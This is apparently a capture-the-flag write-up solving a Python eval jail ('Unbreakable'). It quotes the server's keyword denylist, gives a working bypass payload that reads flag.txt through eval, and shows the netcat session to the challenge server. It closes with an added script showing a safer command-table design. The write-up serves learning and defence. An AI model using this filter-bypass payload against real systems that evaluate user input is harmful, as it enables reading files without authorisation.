Unbreakable [MISC]

Description :

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

Misc - 300 points

Walkthrough

We start by downloading the source files.

We are given a main.py file that probably runs on the server. We can connect to the server using nc 94.237.56.118 35970.

Looking at the main.py file, we see that we can provide input which will be executed via eval. Unfortunately, there is a blacklist that prevents us from using certain characters and substrings.

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 

Additionally, () is appended to the input, so we probably have to end our input with something that is callable.

Looking at the blacklist we figure out that we can use print to output things, open to open a file and read to read the contents of the file.

We can also use single quotes so this payload would be valid to read the flag:

open('flag.txt').read

This would open the flag file and read its contents. Unfortunately this doesn't print the contents of the file, so we have to use print.

print(open('flag.txt').read()) doesn't work, because the appended () would make it print(open('flag.txt').read())() which results in an error.

Fortunately, eval accepts several expressions separated by commas (it evaluates them as a tuple), so we can use print(open('flag.txt').read()),print to print the flag.

This is valid because the appended () would make it print(open('flag.txt').read()),print() which is a valid expression: the first element prints the flag and the second is a plain print() call.

Connecting to the server and providing this input gives us the flag:

┌── 👽AKUMA 🥷 ➤➤ 🌐10.10.0.12
├──[   ~/Desktop/CTF/hackerroyale]
└─  nc 94.237.56.118 35970
Break me, shake me!

$ print(open('flag.txt').read()),print
HTB{3v4l_0r_3vuln??}


WHAT WAS THAT?!

Break me, shake me!

$
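
The blacklist from main.py compared with a fixed command table, as an added example that is not part of the challenge source or the original writeup. It shows that the substring filter passes the walkthrough's input even though the parsed expression contains calls, attribute access and builtin names, and that looking the input up in a table of callables rejects it without evaluating anything. The command names in COMMANDS are assumptions made for illustration.

```python
import ast

# Denylist copied from the challenge's main.py.
BLACKLIST = [';', '"', 'os', '_', '\\', '/', '`', ' ', '-', '!', '[', ']',
             '*', 'import', 'eval', 'banner', 'echo', 'cat', '%', '&', '>',
             '<', '+', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
             'b', 's', 'lower', 'upper', 'system', '}', '{']

def denylist_allows(ans):
    """The challenge's filter: substring match on the raw input text."""
    return not any(tok in ans for tok in BLACKLIST)

def risky_nodes(ans):
    """What the parser sees once '()' is appended: names of the AST node
    types that let an expression reach builtins, attributes or calls."""
    tree = ast.parse(ans + '()', mode='eval')
    risky = (ast.Call, ast.Attribute, ast.Name)
    return sorted({type(n).__name__ for n in ast.walk(tree)
                   if isinstance(n, risky)})

# Hypothetical fix: no eval at all. Input is a key into a fixed table of
# callables (the command names here are assumptions, not from main.py).
COMMANDS = {
    'help': lambda: 'commands: help, ping',
    'ping': lambda: 'pong',
}

def dispatch(ans):
    """Call a command only if the whole input is an exact table key."""
    handler = COMMANDS.get(ans.strip())
    if handler is None:
        return None  # rejected: never parsed, never evaluated
    return handler()

# Input taken from the walkthrough above.
PAYLOAD = "print(open('flag.txt').read()),print"

if __name__ == '__main__':
    print('denylist allows payload:', denylist_allows(PAYLOAD))
    print('AST nodes in payload   :', risky_nodes(PAYLOAD))
    print('dispatch(payload)      :', dispatch(PAYLOAD))
    print('dispatch("ping")       :', dispatch('ping'))
```

The denylist inspects text, while eval acts on the parsed expression, so any spelling that avoids the listed substrings still reaches open and print; the table lookup leaves no expression to parse.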
